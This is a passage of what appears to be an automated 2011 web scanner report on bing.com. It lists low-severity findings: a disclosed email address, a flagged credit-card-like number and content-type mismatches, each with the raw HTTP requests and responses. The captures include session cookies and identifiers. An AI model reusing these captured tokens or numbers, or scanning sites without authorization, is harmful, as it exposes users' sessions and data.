Last-Modified: Tue, 01 Jan 2009 00:00:00 GMT
Vary: Accept-Encoding
Content-Length: 131676
Cache-Control: public, max-age=314489852
Expires: Fri, 12 Mar 2021 23:23:49 GMT
Date: Sat, 26 Mar 2011 01:06:17 GMT
Connection: close


/* File: /validation.js */


function isEmpty(obj) {
for (var n in obj) {
return false;
}
return true;
}
function isValidAddress(anElement,displayName) {
var aValue = anElement.value;
var mikExp1 = /
...[SNIP]...
esults == -1) {
alert(errorMsg);
anElement.focus();
return false;
}else{return true;}
}
function isValidEmail(anElement){
if(!validateEmail(anElement)){
alert("Please enter a valid email address (e.g. jane.doe@my-email.com or john_doe@johndoe.com)");
return false;
}
else{
return true;
}
}
function validateEmail(anElement) {
var emailAddress = anElement.value;
var regExp = /^[\w-]+(\.[\w-]+)*@([\w-]+\.)+[a-zA-Z]{2,7}$/;
return emailAddress.mat
...[SNIP]...

5.2. http://www.bing.com/travel/scripts/sCode.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel/scripts/sCode.js

Issue detail

The following email address was disclosed in the response:

Request

GET /travel/scripts/sCode.js?v=5.10.2.6-1299886677914 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/travel/?cid=homenav&FORM=Z9LH5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lbc=1; ETID=BCID-z168rde13ifflcyz5fi936uodfqq4_VID-z79jcagaeglducyz4dt98uemfbiss_UID-; JSESSIONID=EB05C7B008A25DA50D3A0077DD534D37; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=; RMS=F=Oi&A=SAAGAAAAAAAQ; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099&CW=1410&bIm=915

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Last-Modified: Tue, 01 Jan 2009 00:00:00 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 23302
Cache-Control: public, max-age=314489762
Expires: Fri, 12 Mar 2021 23:22:22 GMT
Date: Sat, 26 Mar 2011 01:06:20 GMT
Connection: close

/** Hard coded to fail to /travel if we can't determine the path for the omniture cookies**/
var s_cookiePath_a = document.location.pathname;
s_cookiePath_a = s_cookiePath_a.split('/');
s_cookiePat
...[SNIP]...
`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=
...[SNIP]...

6. Credit card numbers disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following credit card number was disclosed in the response:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /search?q=James+Dean&FORM=Z9LH8 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099&CW=1426&bIm=915; RMS=F=Oi&A=AAAAAAAAAAAQ

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:04:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<a class="sa_cpt" u="0|1000|4832186282674202|9e29617c,cd3807d1">
...[SNIP]...

7. Content type incorrectly stated  previous
There are 7 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


7.1. http://www.bing.com/entertainment/services/user/settings  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /entertainment/services/user/settings

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /entertainment/services/user/settings?callback=jsonp1301101466664&responseEncoding=json HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/entertainment?FORM=Z9LH6
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=; RMS=F=Oi&A=SAAGAAAAAAAQ; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099&CW=1410&bIm=915

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 167
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:06:17 GMT
Connection: close

jsonp1301101466664({"user":{"settings":{"location":{"$latitude":'38.906898498',"$longitude":'-77.028396606',"$":'Washington, District Of Columbia'},"$":null},"$":""}})

7.2. http://www.bing.com/fd/AnswerBarHandler  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /fd/AnswerBarHandler

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /fd/AnswerBarHandler?q=02110&vertical=VirtualEarth&subvertical=maps HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/maps/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; _HOP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=O

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 331
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 00:56:52 GMT
Connection: close

<ul class="sw_a" id="sw_abarl"><li><a href="/search?q=02110" onmousedown="return si_T('&amp;ID=FD,4.1')">Web</a></li><li class="sw_aa"><div class="sw_aal"></div><div class="sw_aat">Maps</div><div clas
...[SNIP]...

7.3. http://www.bing.com/getimage  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /getimage

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /getimage?q=FEV3_fe67323f6b0093060650b333da19ee0c_1&wf=Genimage HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=events&FORM=O1RE3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=; RMS=F=Oi&A=SAAGAAAAAAAQ; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099&CW=1426&bIm=915

Response

HTTP/1.1 200 OK
Content-Length: 3120
Content-Type: image/jpeg
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Cache-Control: public, max-age=64734
Date: Sat, 26 Mar 2011 01:05:18 GMT
Connection: close

......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......d.d.."..............................
...[SNIP]...

7.4. http://www.bing.com/maps/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /maps/default.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /maps/default.aspx?q=02110 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/maps/
Content-Length: 2674
Origin: http://www.bing.com
Cache-Control: no-cache
X-MicrosoftAjax: Delta=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL=true; htsk=false; cbout=false; FLCASET=Mon%2c+01+Jan+0001+06%3a00%3a00+GMT; FLCASID=ab8b01fc3dc64a86bedff0d1da7af5b9; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; _HOP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=O

scriptManager=scriptManager%7Cgo&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEyNjkwNzMwOQ9kFgxmDxYCHgRUZXh0BQk8ZmQ6aGVhZD5kAgUPFgIfAAUKPC9mZDpoZWFkPmQCBg8WAh8ABQk8ZmQ6Ym9keT5kAgcPFgIeB1Zpc
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 7754137a4c054e5e9708e87fdeba1e31
X-Ve-Server: BL2-01205-20110317.509-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001205
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 00:56:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 28057

7245|updatePanel|TaskHost_Search|<span id="TaskHost_SearchTaskPageContext" class="PageContext"><span id="TaskHost_TaskHost_Search_pt" style="display:none;">Map of Boston, MA 02110</span><span id="Task
...[SNIP]...

7.5. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /search

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /search?q=%7bAS%3a%7bQuery%3a%22%2cFullResults%3a1%7d%7d&FORM=O1RE4 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=; RMS=F=Oi&A=SAAGAAAAAAAQ; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099&CW=1410&bIm=915

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:06:24 GMT
Connection: close

Ref A: F829028740354D228CAC9E091EFF5E69 Ref B: FB2AE571B40A041E0356CAEF03D9BBE7 Ref C: Fri Mar 25 18:06:24 2011
PST

7.6. http://www.bing.com/travel/jsdf.vjs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/jsdf.vjs

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /travel/jsdf.vjs?v=48bdcc31 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/travel/?cid=homenav&FORM=Z9LH5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lbc=1; ETID=BCID-z168rde13ifflcyz5fi936uodfqq4_VID-z79jcagaeglducyz4dt98uemfbiss_UID-; JSESSIONID=EB05C7B008A25DA50D3A0077DD534D37; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=; RMS=F=Oi&A=SAAGAAAAAAAQ; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099&CW=1410&bIm=915

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Last-Modified: Tue, 01 Jan 2009 00:00:00 GMT
Vary: Accept-Encoding
Content-Length: 1048
Cache-Control: public, max-age=312634926
Expires: Fri, 19 Feb 2021 12:08:24 GMT
Date: Sat, 26 Mar 2011 01:06:18 GMT
Connection: close

FC.Date.Registry['date-format.flexTravel.filterDates'] = 'M\x2fd\x2fyyyy';
FC.Date.Registry['date-format.hotelReviewDate'] = 'MMMM dd, yyyy';
FC.Date.Registry['date-format.flexTravel.resultsDates'] =
...[SNIP]...

7.7. http://www.bing.com/travel/jsrp.vjs  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/jsrp.vjs

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /travel/jsrp.vjs?c=shared&v=3ce0edf6 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/travel/?cid=homenav&FORM=Z9LH5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lbc=1; ETID=BCID-z168rde13ifflcyz5fi936uodfqq4_VID-z79jcagaeglducyz4dt98uemfbiss_UID-; JSESSIONID=EB05C7B008A25DA50D3A0077DD534D37; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=; RMS=F=Oi&A=SAAGAAAAAAAQ; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099&CW=1410&bIm=915

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Last-Modified: Tue, 01 Jan 2009 00:00:00 GMT
Vary: Accept-Encoding
Content-Length: 10980
Cache-Control: public, max-age=310326938
Expires: Sat, 23 Jan 2021 19:01:55 GMT
Date: Sat, 26 Mar 2011 01:06:17 GMT
Connection: close

FC.ResourcePath.Registry['shared.btn.send'] = '\x2ftravel\x2fstatic\x2fimages\x2fbtnSend-01FVEWL6QO6RYN000JJQPS.gif';
FC.ResourcePath.Registry['shared.fare.button.r'] = '\x2ftravel\x2fstatic\x2fimages
...[SNIP]...

Report generated by XSS.CX at Fri Mar 25 20:57:09 CDT 2011.